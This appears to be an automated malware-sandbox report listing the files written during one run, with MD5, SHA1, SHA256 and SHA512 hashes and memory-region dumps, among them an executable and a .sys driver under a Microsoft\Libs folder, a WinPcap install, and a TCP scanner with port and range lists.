C:\Users\Admin\Desktop\Launch.exe
| MD5 | 84489e4e8e52cddf9c10e6e9ed585124 |
| SHA1 | 3e89eeb10e4ad854de3561f959f5f928083eb656 |
| SHA256 | 1aa980a6b47eebbc3c85d4126700d08ff8b19db7f3e4028d0b5226c6d261a8de |
| SHA512 | 5d7d00f0f7dd6546574b270c56469bbdec58795f9c24814261ac3a89db8a8d45d3dc0b239cbf95340badbe950812e1a5c5237cd6b51f16738cd77f1b59310202 |
memory/2568-513-0x0000000000400000-0x00000000006C1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\~ZY8D28.tmp
| MD5 | 1cd06169dec4c95e2a3ab622b8a53a1d |
| SHA1 | 989edc24ec7d061d87ba68c8c4cb45e509fa265d |
| SHA256 | 65b30fe7cd4b298fb04093d41a453184f4333e82e5bfb4cb553959fd74c1c96a |
| SHA512 | fb5fcc695ec4c55b9e92eb0c5a003de621c840bc5e32e0ad6adfad55db1426fab45c4e0d02425d2d318ddda1f94ba6e2b23592202373803ba80b963573280e5d |
memory/2836-518-0x0000000000F30000-0x0000000001138000-memory.dmp
memory/2568-520-0x0000000000400000-0x00000000006C1000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | b00f6ed2392d0830e0655fa7d9149e9c |
| SHA1 | adbf51fb2dd2f87e965ebc10a032ae4fb1728844 |
| SHA256 | d74a81c8435fb2ad693182c62cebb4ff3074a7a4bfa502588449a7256e2e23d1 |
| SHA512 | 6dab3eace55c940e620c06dd43c6f99ec5e4306cb44b4a83d2a1ce290dcf1eb91d4cc96ac9351e879912ebd38ef1d23b449ee07ca115864a8b91e93b7006f126 |
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
| MD5 | 0744a7d3b929e1c8e091fa88dde55ce0 |
| SHA1 | f43b0051bf974cf325aff165b76114572ca88083 |
| SHA256 | 92a63dcc6f950f1853fd74abd4c387ea6c3f8ad863969caeafccca4b375c7c88 |
| SHA512 | 1c563e98c589b8c47f772967f4ee3bd01ef07342cf741518265005978f144691b1d880baba997cca0cc5b69e695b2601341bbe56f18afe6490d333c9aa911267 |
memory/5356-542-0x0000000000040000-0x0000000000046000-memory.dmp
memory/5388-546-0x0000000001230000-0x0000000001242000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | a28fd9cbb7c1e72c9896a0c013e0c2eb |
| SHA1 | efb42c48cc62b1fbbdb8368f86e255b1bdef58e7 |
| SHA256 | 91fa48dbc59d1b793d3d28dee0fdb9f3f51b328318495793e9403d0de45695b6 |
| SHA512 | baba80ebe48da78b6843ddf66ae2443175f12d8b412537114af0f9bdbf4d42badd2d8e1543354504b2e1c6a08a2644e94bfd510e2bd9b8dd3613ed1d0d37af19 |
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\WR64.sys
| MD5 | 0c0195c48b6b8582fa6f6373032118da |
| SHA1 | d25340ae8e92a6d29f599fef426a2bc1b5217299 |
| SHA256 | 11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5 |
| SHA512 | ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d |
memory/5388-629-0x0000000001220000-0x000000000122E000-memory.dmp
memory/5140-634-0x00000000005E0000-0x00000000005F4000-memory.dmp
memory/5140-630-0x0000000140000000-0x000000014074D000-memory.dmp
memory/5140-632-0x0000000140000000-0x000000014074D000-memory.dmp
memory/5140-642-0x0000000140000000-0x000000014074D000-memory.dmp
memory/5140-641-0x0000000140000000-0x000000014074D000-memory.dmp
memory/5140-640-0x0000000140000000-0x000000014074D000-memory.dmp
memory/5140-643-0x0000000140000000-0x000000014074D000-memory.dmp
memory/5140-639-0x0000000140000000-0x000000014074D000-memory.dmp
memory/5140-655-0x0000000140000000-0x000000014074D000-memory.dmp
C:\Users\Admin\Downloads\WinPcap_4_1_3.34G2B9LD.exe.part
| MD5 | 7405405b1f863b5c2e3e3a86cba8fd74 |
| SHA1 | 564d5310dc1aaddf13f47887d560d95fb6037c28 |
| SHA256 | 37a7467970704b14402cbf9f48ad6e98ea5b7c88cc48cbf900f9f58553d35146 |
| SHA512 | 44af4ef0104b89acd7a1237980689dc8568e59e6a1d576f24ad78e467ebf70190332627441e67238335dec74d1f7dc7e1b44354ffaf26dcb2995f7625399bd24 |
C:\Users\Admin\Downloads\WinPcap_4_1_3.exe
| MD5 | a11a2f0cfe6d0b4c50945989db6360cd |
| SHA1 | e2516fcd1573e70334c8f50bee5241cdfdf48a00 |
| SHA256 | fc4623b113a1f603c0d9ad5f83130bd6de1c62b973be9892305132389c8588de |
| SHA512 | 2652d84eb91ca7957b4fb3ff77313e5dae978960492669242df4f246296f1bedaa48c0d33ffb286b2859a1b86ef5460060b551edca597b4ec60ee08676877c70 |
\Users\Admin\AppData\Local\Temp\nsc96D.tmp\UserInfo.dll
| MD5 | 7579ade7ae1747a31960a228ce02e666 |
| SHA1 | 8ec8571a296737e819dcf86353a43fcf8ec63351 |
| SHA256 | 564c80dec62d76c53497c40094db360ff8a36e0dc1bda8383d0f9583138997f5 |
| SHA512 | a88bc56e938374c333b0e33cb72951635b5d5a98b9cb2d6785073cbcad23bf4c0f9f69d3b7e87b46c76eb03ced9bb786844ce87656a9e3df4ca24acf43d7a05b |
\Users\Admin\AppData\Local\Temp\nsc96D.tmp\InstallOptions.dll
| MD5 | 325b008aec81e5aaa57096f05d4212b5 |
| SHA1 | 27a2d89747a20305b6518438eff5b9f57f7df5c3 |
| SHA256 | c9cd5c9609e70005926ae5171726a4142ffbcccc771d307efcd195dafc1e6b4b |
| SHA512 | 18362b3aee529a27e85cc087627ecf6e2d21196d725f499c4a185cb3a380999f43ff1833a8ebec3f5ba1d3a113ef83185770e663854121f2d8b885790115afdf |
C:\Users\Admin\AppData\Local\Temp\nsc96D.tmp\ioSpecial.ini
| MD5 | 9f80adc2d4ce8e70b9c3b4237cfd98aa |
| SHA1 | 6816f5f78a66abef60a48928168475e5269f02e0 |
| SHA256 | ad962b9cb36a03f2146b4152ad2afc6013d919298cce31884aa24306861f45b5 |
| SHA512 | 64bd7975478535012425ac566de2e7f621adfe5a346899ecc4f1517267ecc5aa2eb6df90449a7b2c91ea1d91919468dcf2eb177b6a2cc18afd0d47b47300d13c |
C:\Users\Admin\AppData\Local\Temp\nsc96D.tmp\bootOptions.ini
| MD5 | fd207cee8e322335505dc2270719a5be |
| SHA1 | fed1042fd7a5277308b5c4c1cf692db049746662 |
| SHA256 | 68fd7c616543298c1712c61de17e425f1974499a9002ac43a7c0658a37a245b7 |
| SHA512 | dd180c95d9c193f54b5b855d84095e509673fc2c336f846b12d0e5dd68516de6100cc3338695ddbe9e9a70d77a0244cfe82e2983a978fe8433a2feacfd6b911f |
C:\Users\Admin\AppData\Local\Temp\nsc96D.tmp\bootOptions.ini
| MD5 | 130077f80dd7349c08fdf437ed3e895b |
| SHA1 | f7b6b873419d54421a0bc8a86330ab3539371b15 |
| SHA256 | 9f722631b18c88c799b3355e2ae7e9067fe2b3dcb794e614f1783e95b26dbecf |
| SHA512 | 8fe80a8f9c0e45f9252e162acd79708c96ee784a318428c3652a858fa1fba4de53b6d712534697eabd87f20d3d3c20bd9f49d75ed0efa23c3db1b9804c60762f |
C:\Users\Admin\AppData\Local\Temp\nsc96D.tmp\System.dll
| MD5 | c17103ae9072a06da581dec998343fc1 |
| SHA1 | b72148c6bdfaada8b8c3f950e610ee7cf1da1f8d |
| SHA256 | dc58d8ad81cacb0c1ed72e33bff8f23ea40b5252b5bb55d393a0903e6819ae2f |
| SHA512 | d32a71aaef18e993f28096d536e41c4d016850721b31171513ce28bbd805a54fd290b7c3e9d935f72e676a1acfb4f0dcc89d95040a0dd29f2b6975855c18986f |
memory/6080-1085-0x0000000002300000-0x0000000002316000-memory.dmp
C:\Program Files (x86)\WinPcap\WinPcapInstall.dll
| MD5 | e78291558cb803dfd091ad8fb56feecc |
| SHA1 | 4bde2f87e903fe8d3bd80179c5584cec7a8cbdc4 |
| SHA256 | d9f4cd9f0e1bc9a138fb4da6f83c92c3e86eb3de4f988d5943d75c9b1dc6bb9d |
| SHA512 | 042b96bc2c0e6d8b6e2730426938eb7400fd833be8a108a4942f559fedefabc35fd5dcb7ea1898d377b4382c0a9af8eeeebd663a4c852c706e3bd168c1f1f62f |
C:\Users\Admin\AppData\Local\Temp\nsc96D.tmp\ExecDos.dll
| MD5 | a7cd6206240484c8436c66afb12bdfbf |
| SHA1 | 0bb3e24a7eb0a9e5a8eae06b1c6e7551a7ec9919 |
| SHA256 | 69ac56d2fdf3c71b766d3cc49b33b36f1287cc2503310811017467dfcb455926 |
| SHA512 | b9ee7803301e50a8ec20ab3f87eb9e509ea24d11a69e90005f30c1666acc4ed0a208bd56e372e2e5c6a6d901d45f04a12427303d74761983593d10b344c79904 |
C:\Users\Admin\AppData\Local\Temp\nsc96D.tmp\ioSpecial.ini
| MD5 | 01c174c9ae8892bc0fa9b872372d1dff |
| SHA1 | 9644c102e9602ed38cd8c1df4a242915baa7dc63 |
| SHA256 | f4af25af487e36e0f94b73eea39506ff9b58fbc78fa5261025241b418f9273ea |
| SHA512 | 10a7f42d7f0805b1bb6e53ba1268b67f6dabed30eec8e2fb07b288cf9b69b5f05c62bb7b423b3d8f694d6ec115bb62aa32d3c5262b8a87dccd801dc0c169404a |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | 9df49b5e3d9da0c728cd3f8e64f9ea5b |
| SHA1 | 78366a8e49d866074bd45cf15dfe6913cd22f484 |
| SHA256 | d9d820c734b0a934aea44e0c14a7562d9503d06760b0563b5b7649da2dd6ecee |
| SHA512 | 425b9caea56ec989cd4e32f2be22503698d82dae6ed24f91ad94546e4cf278d7284e61edcf9bbd154b3c057c8500fc8755825d5c3b4c9961e4d1be1b2335588b |
C:\Users\Admin\Downloads\1.txt
| MD5 | fd00d53d28dd1b95827a7a3b0374ad3f |
| SHA1 | 41c9834e0e2f38e59a61e5eaf835339f91bcbdbd |
| SHA256 | d59d876ba88ecf166a01adc81f9e132527f10ae800a328c02699bcdc2e4f8fa3 |
| SHA512 | 0fda2dbe7d5d8a5076307798581c2e0eeb25b7b4ee487b5b94124170ba78bcf11a4957120ea7cf03cc979de5283d9543cc2e3ca1f05a2ac16284eba3345c8d6a |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | 6f877d7bb0530f14d3bb33290c45f54a |
| SHA1 | ccaba5a8d33124bc499e1acffe3bcc9dbad168b4 |
| SHA256 | 8094314dbb565b0ea15498ca0d962c37aa79a08e58fe96f2d177a8ade43497c4 |
| SHA512 | 0e57abb875bec212b1e5cfdd35841918c24cc8c28808535d56af7dc0ed45addf25feb91aa96f0976c9cdf477758964368e267dd3fa607dbe6044637b8d157fa5 |
memory/5692-1259-0x0000000000400000-0x00000000006C1000-memory.dmp
\Windows\SysWOW64\wpcap.dll
| MD5 | 4633b298d57014627831ccac89a2c50b |
| SHA1 | e5f449766722c5c25fa02b065d22a854b6a32a5b |
| SHA256 | b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9 |
| SHA512 | 29590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3 |
\Windows\SysWOW64\Packet.dll
| MD5 | 86316be34481c1ed5b792169312673fd |
| SHA1 | 6ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5 |
| SHA256 | 49656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918 |
| SHA512 | 3a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc |
memory/5692-1265-0x00000000009C0000-0x00000000009D8000-memory.dmp
memory/5692-1273-0x0000000000400000-0x00000000006C1000-memory.dmp
C:\Users\Admin\Desktop\Bin\ports.txt
| MD5 | 46789acbb2c6e713fc74f12451cd880c |
| SHA1 | 2ed7c4640faa399a3cd960fe13fef909645aa826 |
| SHA256 | 3e824fc4cc1453e47d0324c49707f1832011feaaecae6ebaa180dad8cef93db4 |
| SHA512 | 59b748b31232521302d326f438b5a2a4f917983ca1fda50e88ffa5cd1bc50471c2e59fc13de7ab89113f1b037f3353a7c1b0177e79153bcabe9006155a21df9f |
C:\Users\Admin\Desktop\Bin\ranges.txt
| MD5 | 784486a3dbed800b1d1e12d368139f4b |
| SHA1 | 57ce954e60a779b825885acf6287b6daf9203fd9 |
| SHA256 | 54898f3f621fd02fbc3bb81fd2a541cdad715706d01bdac32754ca7dfe99ce48 |
| SHA512 | b483ccb2cd0662e33c6d179286de3525012f0953ba9b73c032e2d743e6996a1eefc04ab978c0819b35d8cec80ae76ae2431d947dadbb948ec0a3bdf13f8035b6 |
C:\Users\Admin\Desktop\Bin\config.ini
| MD5 | adcb8c937da42efcae5824979b40f377 |
| SHA1 | 1ff1e58d7cb6b65d7da894d78678ce23a737959c |
| SHA256 | b426f21cecc68ac6b67bde572858e885e1d728228cd6549762c281a65fa22d79 |
| SHA512 | 1e409a42b7105bcc7c67de43b951204803ccb70d4946025e3489137e758848a7247389901d68a6b81cb792eaf3ad309eb0c790e7caf657315c87f9caad3f9f5f |
memory/3812-1272-0x0000000000EE0000-0x0000000000EF8000-memory.dmp
C:\Users\Admin\Desktop\Bin\TcpScanner.exe
| MD5 | 6a4d8d10d15c2ebc8de1d117bf0b7d9b |
| SHA1 | 4fd1d86c3c328741cd6439569d203ffb3a98ad6c |
| SHA256 | 6549b8b2f143225093c58896e2529eb368900b705470aad22c8d84153cfc0c3b |
| SHA512 | eaae970d7391002cb4121500e39bbc1d7223f79cce999fa74b2959a185c013c07de6cfafcad273e95abdc5f996b663aae05884c5714e74921f72e42e132519a6 |
memory/3812-1288-0x0000000000400000-0x0000000000DBE000-memory.dmp
memory/3812-1293-0x0000000000400000-0x0000000000DBE000-memory.dmp